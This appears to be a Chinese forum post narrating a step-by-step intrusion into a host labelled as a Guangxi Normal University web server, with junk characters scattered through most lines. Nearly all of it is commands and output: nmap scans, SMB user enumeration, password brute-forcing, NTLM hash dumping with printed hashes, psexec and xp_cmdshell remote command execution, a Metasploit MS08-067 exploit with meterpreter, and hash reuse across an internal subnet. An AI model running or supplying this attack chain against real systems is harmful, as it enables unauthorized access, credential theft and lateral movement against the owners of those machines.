广西师范网站http://202.103.242.241/
$ S7 ~ s! s, s1 g- z# w. i5 S x) u' V2 Y& ?4 X
root@bt:~# nmap -sS -sV 202.103.242.241# d# u* R8 s/ z' B4 X6 q% a: j! s
) q7 W: A+ Y: k( b/ d1 S( G: z4 YStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST# u6 }% b. q" |( U
; \; p" Y6 P3 G# B# v3 D: iNmap scan report for bogon (202.103.242.241)5 q/ k' `* M; q: R0 u N' O
; s3 k0 H- e$ {8 V3 a$ R6 H8 N9 P
Host is up (0.00048s latency).
' T+ D4 ]2 ~& x }/ r" }& h# I; S B# X2 ?3 Z O6 M' O
Not shown: 993 closed ports+ u8 z: t; O6 H
* X) Q$ F2 D; s% B+ d+ j5 w S; APORT STATE SERVICE VERSION
- w; `- A4 y& K' i, O6 K/ k Y% X1 f1 U# ~7 i3 ]- y# v2 Y
135/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)
2 f) j1 N# g6 v6 {. [" i+ W2 R7 {9 _4 \7 b* T- ?
139/tcp open netbios-ssn
) {6 j3 N) b+ {/ l$ K; F; w. Z! }/ d$ E4 ~% U1 O
445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-ds, _( m( W2 s. I# q
7 f# }5 S) ?# j* D) F8 K1025/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)
9 |6 C5 i8 F! Y. R6 B+ U, y' t% |' b1 y/ ]! ]
1026/tcp open msrpc Microsoft Windows RPC
/ E* V3 s% J! B$ c0 n6 K
; _( t5 o3 c* D8 e1 |& `; k: D3372/tcp open msdtc?
$ H8 R$ w; T% C; J
7 \' I4 R1 e4 |1 M, g3 u3389/tcp open ms-term-serv?7 ^; b" a$ i, J$ G# {9 @
/ F) r$ n& a1 E# x2 Y
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
. r! i$ W4 y# FSF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
! D( X2 y# [3 k9 T% G8 G6 J$ `5 B
, W: R# J; D. |5 wSF GetRequest,6,”hO\n\x000Z”)%r(RTSPRequest,6,”hO\n\x000Z”)%r(HTTPOptions
`" l2 v B1 b* \1 h7 N
0 [! E1 D0 L- c/ A5 n" {5 H0 nSF:,6,”hO\n\x000Z”)%r(Help,6,”hO\n\x000Z”)%r(SSLSessionReq,6,”hO\n\x000Z”)
J% X$ a# B) {5 }( p4 y- V5 M3 ~+ h
SF:%r(FourOhFourRequest,6,”hO\n\x000Z”)%r(LPDString,6,”hO\n\x000Z”)%r(SIPO
- b8 q$ L9 g) y! A# H% W1 M, s4 @
! e0 s3 n a1 T6 J. y( `, o* @* PSF:ptions,6,”hO\n\x000Z”);( u. F. ~7 x, b ~0 w; I5 m6 f
$ ?1 j) g. ]( R1 \/ ?1 H
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)* L' h2 Y' u# C7 h( i
5 i$ ^" d. h# v5 f+ q3 o7 d' f2 [
Service Info: OS: Windows
+ z. B& W8 H- ]* a3 y3 v2 M# `
% M" b8 h0 t6 E9 I z. u. cService detection performed. Please report any incorrect results at http://nmap.org/submit/ .8 J J7 {* s8 z8 ~7 M3 J6 K z
; v" m4 b- I5 `7 a2 W$ J
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds
3 Q/ d2 _" @5 E2 p# }: x: I y+ o' B) k2 v$ V2 M% @
root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb //列出扫描脚本1 V8 d' I( J& k e; x3 Q. ?5 v
4 o, }" Y. x, J( `0 W6 d F
-rw-r–r– 1 root root 44055 2011-07-09 07:36 smb-brute.nse, S0 S2 t2 B9 x7 d* a) o% Z
, U8 X i6 }3 i* _-rw-r–r– 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse9 ^3 r7 J2 J7 B
% @% E# f- j$ a2 T
-rw-r–r– 1 root root 4806 2011-07-09 07:36 smb-enum-domains.nse
% K! R% B. n; B3 r; j/ N
. T0 I' {" j# }+ H-rw-r–r– 1 root root 3475 2011-07-09 07:36 smb-enum-groups.nse2 r/ i# ]4 D& g6 J7 k
- R' r. E9 Q+ v+ i% d! t-rw-r–r– 1 root root 7958 2011-07-09 07:36 smb-enum-processes.nse
4 i. m" s2 E4 \) y- K7 ?+ {- Q' V: G6 _
-rw-r–r– 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
/ B! ^. x! x$ f" |8 f
/ V# C3 a3 I7 l T% N-rw-r–r– 1 root root 6014 2011-07-09 07:36 smb-enum-shares.nse8 G$ F# V- D) c- f0 S
/ y5 L# J8 `9 h-rw-r–r– 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse* r' \) f& f; m9 U7 @! J0 O
* @ O% K: z' e9 e# |7 L-rw-r–r– 1 root root 1658 2011-07-09 07:36 smb-flood.nse
p! k4 g. ?$ J- L) J/ _- Z& o# c* \2 i! M6 I8 l4 Y
-rw-r–r– 1 root root 2906 2011-07-09 07:36 smb-os-discovery.nse+ Y7 N4 A6 y( i& r- ]. q0 S" i
$ n' s! z8 S% J-rw-r–r– 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
8 d3 e) S6 E; K+ b5 z* v0 a+ d; `9 a5 p8 G( a( \# D
-rw-r–r– 1 root root 4362 2011-07-09 07:36 smb-security-mode.nse
! E5 v% I& d& T6 |) p* \
& @! |: O9 j! w' h) |/ T-rw-r–r– 1 root root 2311 2011-07-09 07:36 smb-server-stats.nse
( f5 ^) \% f; k
8 Q0 D9 U6 u" b-rw-r–r– 1 root root 13719 2011-07-09 07:36 smb-system-info.nse& o) j! z3 N/ G# N
' p5 J9 G8 Z+ P, W: k-rw-r–r– 1 root root 1429 2011-07-09 07:36 smbv2-enabled.nse
3 N. A5 K* w% e( |
+ J8 s3 X/ E4 ?0 [root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-users.nse 202.103.242.241 7 I% I9 \ t* N- p
5 h- ]" i% i/ @5 R8 C8 n//此乃使用脚本扫描远程机器所存在的账户名! P B3 |4 Y0 S$ b" W3 e
4 r9 q- C4 t# I" c) i
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
3 N4 e# p. |9 o" N; q# h1 s' W# `( _
Nmap scan report for bogon (202.103.242.241)* F1 X% |" }, ?, e# J* X; B" C
) |+ s1 M6 _: mHost is up (0.00038s latency).
, v2 ]' l5 t t
/ M* a- q* r) {* B7 S* [+ RNot shown: 993 closed ports; F# g+ E! ?1 d# y' {$ O/ @
) \+ ^, H2 ?& p
PORT STATE SERVICE. E; C7 }. i. L' B
( J2 S2 k2 x" C: o" y$ A
135/tcp open msrpc
1 m5 V! O( V. j; T6 o% V- }
0 B' e* K9 l7 `: e4 M139/tcp open netbios-ssn% g9 P; a: y2 {0 j) ~+ b
" V) X2 A) E* j! C5 m r$ a445/tcp open microsoft-ds
$ `9 {9 d7 ~6 D. J) W) r, m! h/ v% X L
1025/tcp open NFS-or-IIS- D6 Y0 N3 ]4 \" F* f3 e0 @
- h0 f) Y b, ^, v4 X2 }
1026/tcp open LSA-or-nterm
* k+ ?/ l, \; y2 N8 j& V9 F+ R! I( j5 L& d
3372/tcp open msdtc
% z! l, C$ a) S" `; Z
5 D* x; c* N" f3389/tcp open ms-term-serv8 Q7 R& z$ z" }* l3 O
! g% k- Z7 c! J7 h# a/ bMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
$ B9 _) l2 x' A$ t- t, v, N. B
+ j) z* p7 ]2 W- P3 y4 SHost script results:
" |* W# M# o7 b' r
! X; k: f, `+ g1 J8 A| smb-enum-users: I0 ]+ u1 H7 c' n
6 m0 L0 y% I$ t& [; S& G
|_ Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser //扫描结果9 ~ N2 h8 r, W: J( U5 S
9 F& ^- V4 E$ g5 d% F
Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds0 c- [0 R* T* P8 E8 r3 K' C3 h/ | j
! ~# m& f0 h/ Proot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-shares.nse 202.103.242.241 8 A4 R+ X, H4 g# `: C! v( `) Q2 Q
: ]. n2 I! U# X J
//查看共享! G8 W. G, n: [8 O( x2 f+ [
, K6 n- ?$ i: ?( L
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
: X2 P6 q z8 H/ K, M% { ~9 b; Y" v4 ?/ O* c+ R3 _0 y3 y
Nmap scan report for bogon (202.103.242.241)5 P4 Q }8 @$ o
$ d* y& D7 ]) G8 z7 z! i$ a% g
Host is up (0.00035s latency)./ _. R; P0 h) H. G' }( e
/ t8 {4 k) C2 K& G( rNot shown: 993 closed ports" q/ F) _3 |- z3 V: x) l
! R& v4 A, N" O! l" M* IPORT STATE SERVICE
- z; ~9 G2 } d6 a. Y" e* ^& r
+ ^3 N8 q0 Z$ x2 O5 w; d135/tcp open msrpc
' x! _! h4 o7 N- g/ y u8 o0 ]
5 Y6 H$ _6 |) v" R4 X" T: u' y0 s139/tcp open netbios-ssn
; d" C0 W9 m0 o- |& A7 r l4 i4 P* Z' r( t
445/tcp open microsoft-ds- [9 L+ A, ]4 N: D( }, R$ g
* r, r; t, Q' I3 D3 g! o: w. X1025/tcp open NFS-or-IIS
Z) z$ W5 }3 f1 {9 |- n
! K" V- Z3 r) f$ i! G2 K) z% w1026/tcp open LSA-or-nterm; v+ b, t, ^( V3 p/ A
% [# S) D, A9 m7 A
3372/tcp open msdtc
9 G/ {7 R7 a- C l$ q$ e- d5 k# P3 ~ Y7 x P
3389/tcp open ms-term-serv: R* l' y) V0 M8 a' J+ M' X
9 [4 ~% {8 s" T6 h$ l9 Z j9 g
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)) J# S, M1 `4 m4 D! u' @4 u4 {
0 ~/ U$ D5 `+ y
Host script results: i1 k- x! l4 R0 h
8 z7 ~, t, x F6 L# S7 C3 X| smb-enum-shares:
) ~: |! V9 @3 ^3 G+ M( u. Y$ r3 z" g$ h7 M9 m- U
| ADMIN$
/ M6 Z. x; b' Y2 I- Y$ k4 } S7 ^
| Anonymous access: <none>, k1 r6 H( S# Y4 i
4 h: l3 }& H( Z| C$" L8 R" ]8 d* }0 M+ H$ d! L9 D4 P
6 K2 B8 P/ o8 j: L9 Z e5 t| Anonymous access: <none>
9 I/ o8 S& L! D4 }
1 O' o: {( t. g! X& Y| IPC$0 t9 _1 {! @, h2 @
+ A0 w O \, U9 c
|_ Anonymous access: READ8 W w0 R( B/ u' ]( @. L
' h8 X/ d7 U6 ?! S" T1 x; \) INmap done: 1 IP address (1 host up) scanned in 1.05 seconds2 e L6 y! s- G, f! N1 i
4 m! D% s% c' T% C, H# Lroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse 202.103.242.241
- k1 T6 x8 N' j& [. }9 Z0 o: h
4 X! g8 Q$ O7 c//获取用户密码
$ R2 Y( t2 l* p2 D; c% A2 E: F: k& u$ }
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
$ `: ^. S( p: B# i; S" Y) ~ u# B0 d* Z8 L+ @6 t! j
Nmap scan report for bogon (202.103.242.2418)
' B3 @7 K& }6 L c h$ A" g- i, `
0 L4 R) I- q6 d+ u% cHost is up (0.00041s latency).
; } c- L3 J3 b- p
5 w$ W, j! z! \' PNot shown: 993 closed ports
# X9 O1 V. y. }/ ^
* @9 r" h ]; h8 g9 z2 B; s9 [PORT STATE SERVICE
" N/ M# g' {1 |# M
) U F4 {6 B$ l135/tcp open msrpc
- V8 i( I( E! M" x& l6 D% d. v# k7 B) ]! k; f
139/tcp open netbios-ssn/ h: m* K3 b8 ?: A y
3 t9 ?) U+ \. H! [445/tcp open microsoft-ds/ e2 r3 l6 p, T. e
" H) p$ Z! f# I* Q1 R8 c r
1025/tcp open NFS-or-IIS# O9 P7 w' D1 F
* n% \, _ f6 \ l7 e D7 B
1026/tcp open LSA-or-nterm" F# K5 e; S( }1 r( |$ [' e
6 t3 U* v2 H0 Q* `3372/tcp open msdtc) |- ]5 G* W+ V8 Q# @1 {# G
" k$ s/ w! d" b: _/ I
3389/tcp open ms-term-serv
( E! l% n8 x: {7 E$ e' P8 x8 o( B0 @, Y# K
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)9 b X$ K o5 O# y' E
) K/ I9 n- p7 THost script results:' q3 g( m* X# e* j1 N
- [0 B P& c8 V2 l% [2 ^+ U& Z- D| smb-brute:) ^/ B S2 K& L2 x
" e- U) y" Y) {4 o& v Y" |9 S
administrator:<blank> => Login was successful
" y7 G" {; \5 e4 ?( r/ ?$ \) ]! Y9 X6 X9 n4 b" ?1 w) E
|_ test:123456 => Login was successful: p3 s* S/ Z3 v
! d7 z' Y2 V# i! ~Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds
- i, H2 k. ?: R' {2 ^+ b2 b {5 ^1 y+ a6 \" K
root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2//抓hash
8 L0 S3 j j) A4 }/ A$ y
: B* r" d6 Z9 S8 ?root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data. g# y/ E: H+ B0 G+ ]/ m
: {* M2 ]) v( G) t, \! U* k; xroot@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse* e6 d( ?) i. F5 T5 I, S
6 s) t7 a2 J5 p, T3 Rroot@bt:~# nmap –script=smb-pwdump.nse –script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139* {- Y$ A/ N3 ]1 k' n
5 Q4 ?" {9 \$ P9 B/ C& P
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST+ m. _% E$ C" }: e& s
8 H" `$ p/ J$ a5 t9 sNmap scan report for bogon (202.103.242.241)
' x4 x( q) Y9 n4 B4 }, g* [% a8 ^9 k5 _8 y- o. R" z
Host is up (0.0012s latency).
/ l, h1 \/ g. g1 ^! @; w4 u6 ]& b: u$ _
PORT STATE SERVICE' |. z: w \* _
# j. {8 ^: [/ ~5 n8 G! p. z- w% m& h0 [
135/tcp open msrpc+ n* F' j9 H' l/ G% ^" a$ a
4 G) Y }1 R/ O# m
139/tcp open netbios-ssn
5 r% `6 C4 H( b9 o# E
: [* C& [( U4 u" q; F, H; x445/tcp open microsoft-ds8 g+ U. P G+ }* s4 v& b) M P
& D3 e3 ?$ J$ ]: f3 mMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems) l( t/ F% L) O* @# a
8 ]8 O' \3 d6 S! u5 J) a
Host script results:
9 U0 Q0 Y) ?+ M' }, K- ?7 T
' Q3 n6 ~: q! R| smb-pwdump:
* a( k! A0 N H. ?5 a. s9 q$ o+ U# t I b
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************- U% A, R5 G) J) m3 G
" z$ U+ U% v: B; }% t1 h+ W/ p| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
" V4 `9 N: Z r8 R$ [% Q. b" ] p" u ]. @" H7 N; Z- r
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4* w* s6 p3 O# `$ c0 F8 j" d) v
5 j! v6 o% [4 W; v+ k* @- ?
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2: H, n3 w% n! V+ e4 X9 ^
# w" \, k! [/ B& p# [- n
Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds
% Y ]; l( m& V
' d) j+ H! H9 h/ QC:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test //获取一个cmdshell
1 z! L7 M/ v5 u' F; E- j
1 ]1 _# @7 I0 r; m5 T8 {4 A' F-p 123456 -e cmd.exe
5 g8 _( k$ L+ X% T) ^( l
4 j# v* d( P7 |; }PsExec v1.55 – Execute processes remotely
% j1 X Q8 ~9 `- T# y: Y" r
& ^0 t! {# l( c `: A% MCopyright (C) 2001-2004 Mark Russinovich/ _! n, l# K8 b, }
3 f! u% p, }- A; ]" @. V2 @& _
Sysinternals – www.sysinternals.com0 X7 @$ Y" z* c1 ?* F- J$ v% T
?6 W7 q- N! V0 ?- dMicrosoft Windows 2000 [Version 5.00.2195]- l; Q3 l8 J# j2 T
m ]3 h) c0 m; q: ?( f( T' }(C) 版权所有 1985-2000 Microsoft Corp.$ O( R% a5 f0 E0 b5 h5 e1 C
. t' w9 ]( g8 ~; @
C:\WINNT\system32>ipconfig/ L2 A- G2 l% Y
5 p5 t6 o6 }. r9 ^! e2 e1 `: wWindows 2000 IP Configuration
7 i5 {- `- A: g$ P3 I2 t* B: y2 u6 x9 R0 O" Q- |
Ethernet adapter 本地连接:0 h; y h- T3 h# n0 T
/ v* r" u2 |5 k& M$ O, @
Connection-specific DNS Suffix . :
4 c* H1 D- [, F
5 j3 |. X& u' F' M, HIP Address. . . . . . . . . . . . : 202.103.242.241
! Y" t+ w. L! Z5 i
/ C1 M+ X+ ~3 _) q/ ?% `+ ASubnet Mask . . . . . . . . . . . : 255.255.255.0
$ i! z% b) r2 y8 z% k3 r# v. Q
8 V k t/ D% t* l8 z# l- ^Default Gateway . . . . . . . . . : 202.103.1.1/ e; a' t) e6 z, k' y. X; l
+ G4 @% V4 k/ l( `& CC:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P “123456″ -Q “exec master..xp_cmdshell 'net user' “ //远程登录sa执行命令; E4 Z0 j$ c/ ?) G1 Y# C7 F5 b! X
9 U* P* w; M, r6 b5 T( zroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-check-vulns.nse 202.103.242.241 //检测目标机器漏洞
5 D3 S( q: o' H# [0 E) J* h
2 o% p$ D) x2 Y+ e+ b- G4 JStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST T, r" Q# ] i% R" \0 I1 O( N. o
" C3 g& D. t* D2 {+ G7 U
Nmap scan report for bogon (202.103.242.241)
- T7 M) O/ X2 }& x8 `1 A/ v2 C) q1 u7 {% j, {; e% q5 G" } T
Host is up (0.00046s latency).& b, K" y' s- @( J* X
# Q# n" T2 e* Y* V! Y, i9 d! J
Not shown: 993 closed ports9 o7 U6 t& u4 X! v( H; A5 o# N
. ~) U+ k( ?9 p! E/ G
PORT STATE SERVICE, K7 N" h5 d; G, f$ n& X
. R: L* i* R) k& }6 M8 h. N135/tcp open msrpc) m- y3 r. U: a( R5 N+ f
$ ^& s" L' X2 T+ U) e7 z' H
139/tcp open netbios-ssn" A7 d) w7 n3 S* l; _
3 |/ S; G9 t, ^, c
445/tcp open microsoft-ds
4 V# t1 }; |" h$ P: g
2 U, m# [6 P/ S: I4 Y1025/tcp open NFS-or-IIS
$ J( O$ t) e- p d! N5 Q
* e" g, m7 {5 L& s7 y1 O0 c- t& z1026/tcp open LSA-or-nterm
$ i0 m' \8 F' C2 `& ?% w; q; {$ `' Z9 ^8 x8 ?2 I9 O
3372/tcp open msdtc% I+ ^) ]+ {2 ^2 \4 E. B3 N
4 `, h: G1 d& v6 q. O, Q9 f- I
3389/tcp open ms-term-serv
1 H* }( u6 D. L, x( H
. w, w7 p0 {; a7 x: {. zMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)1 T; I$ l% K' W% h' C8 L
: ]/ m* @. b2 K# C7 z. }
Host script results:
7 u/ N. H5 i1 i" M! ^( O3 ^
/ _. p( D! m# @| smb-check-vulns:
% G& ~& U+ t8 a% o) i7 p/ x' H$ x
|_ MS08-067: VULNERABLE
6 W$ N3 U" C% }( q6 S* C% I4 k! P+ ^7 B h
Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds9 e! B4 ^/ |$ ~0 z& ^! {& k: T
/ @5 g* Q9 D0 ~2 U
root@bt:~# msfconsole //在msf上利用ms08-067漏洞对目标机器进行溢出% r& S. x! N9 t r) H
, n5 I: k$ ~6 A3 @
msf > search ms089 R1 U' O4 T, h; o( D, ]3 t# f
, s' j$ S, u& W! H+ X, y
msf > use exploit/windows/smb/ms08_067_netapi
* ]% }# U1 K& o% m5 }5 `
7 J7 v- z! X% L d) \, Hmsf exploit(ms08_067_netapi) > show options' E: q4 ]1 l. M! y$ x9 X$ v) e: |
. |- m! O/ W) c0 [% Hmsf exploit(ms08_067_netapi) > set RHOST 202.103.242.241# L& u e! p5 Q/ m
5 ~# d% I4 r, V ^6 S6 {1 r: n5 W0 vmsf exploit(ms08_067_netapi) > show payloads
8 y" S/ ?/ b/ M; t3 U& D0 `7 l
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
5 A6 f: D. P, d) _; K% S
a$ u: d7 m! r. }6 ^2 i; z+ Umsf exploit(ms08_067_netapi) > exploit1 x- ~! h" c3 R
: @: A, M* \% W3 z
meterpreter >. K: s, n& Y k8 v; c2 I
* h, t, q% n" _3 t7 a3 V4 Q# uBackground session 2? [y/N] (ctrl+z)# ~$ e) c6 t2 |+ g
9 _( q3 A! G2 Q4 d$ k& Q" N
msf exploit(ms08_067_netapi) > sessions -l
' m, c$ F: B/ w# f' Z7 p5 L" X9 i( g: Q; M( F& \
root@bt:/usr/local/share/nmap/scripts# vim usernames.txt% A: K* h, h* j2 M6 j" }5 c
! X, [6 @0 k% B5 j- p" h" Y1 s% W1 o
test3 s; F' ~" @: ~& p2 }
" P |* s" [1 H" T h( D5 A! a, Fadministrator
; M0 S/ t L% b( y. J. C5 v7 K( L8 d
root@bt:/usr/local/share/nmap/scripts# vim password.txt
~0 q3 P- n* T4 W- @# M3 z: K% }
' M- K" `! ]% N8 ~+ m44EFCE164AB921CAAAD3B435B51404EE
{0 q6 q3 l2 w8 I6 b6 e" Q) s" b7 R5 t" e6 |* o! \
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse –script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254 5 p; [( n; G4 x
; \: F) j7 D- I) w' w8 O9 D //利用用户名跟获取的hash尝试对整段内网进行登录4 C& s$ G2 p" s1 B% R+ g
7 G6 H+ e( W$ X( Z6 K& M. K+ t
Nmap scan report for 192.168.1.105
0 _+ H L/ ~7 ?9 o1 ]" K+ C& e9 J( E3 N4 L, I& V0 }. P, y1 |5 |8 s
Host is up (0.00088s latency).
- t# \. x/ E7 g5 g, x$ q* l- T3 f
; I: i" D7 S0 t+ SNot shown: 993 closed ports$ g4 h. W; Z2 w( O5 y, a T
3 g9 `% o" w# c6 _% a* k2 |PORT STATE SERVICE: n1 d& h, k7 S; N
/ G$ R" Q9 L# a& ]8 |: e! l135/tcp open msrpc2 Z; O2 g5 ?7 Y9 S1 H% r
1 H8 ?! T% k1 W% a
139/tcp open netbios-ssn
( u9 `- \3 X% i, g2 A* S; I+ Y3 i* P8 l. e! H
445/tcp open microsoft-ds) L# M- e: w! ~( F
7 v; f- n2 {. z, o2 E" R
1025/tcp open NFS-or-IIS$ E! ?8 ~& Y. L& ^& a' ^$ `
6 V8 z Y8 v' I3 b8 \6 Z1026/tcp open LSA-or-nterm4 |9 B! u! e4 D5 p, Z
' L0 d3 j, ^6 Y5 {) V
3372/tcp open msdtc9 e& o# k l/ b% z: T
5 h4 u. x4 }: q! v, h: ~. M: o3389/tcp open ms-term-serv- b8 i6 c9 D' `" H2 {3 x+ H
: B) K, t. Y. n+ T; d" kMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)1 |9 ~3 c+ N ]) h
1 |1 b. s& m- g' V% p2 n$ B
Host script results:6 o9 {/ G1 k. H) B2 d+ x
' E8 p9 }$ O, T4 S| smb-brute:
! y' Q* E6 L* Z* \
- Q- W% L7 |4 b/ Z( q|_ administrator:<blank> => Login was successful
0 ]5 _ S: r& k- \, z& a6 w# w1 [- A6 ?; j2 {+ d+ n/ Q
攻击成功,一个简单的msf+nmap攻击~~·: Q. S' c7 n! E+ s
+ V$ \2 {: Z- b5 ^& q7 O |
发表于 2012-12-4 12:46:42
收藏
支持
反对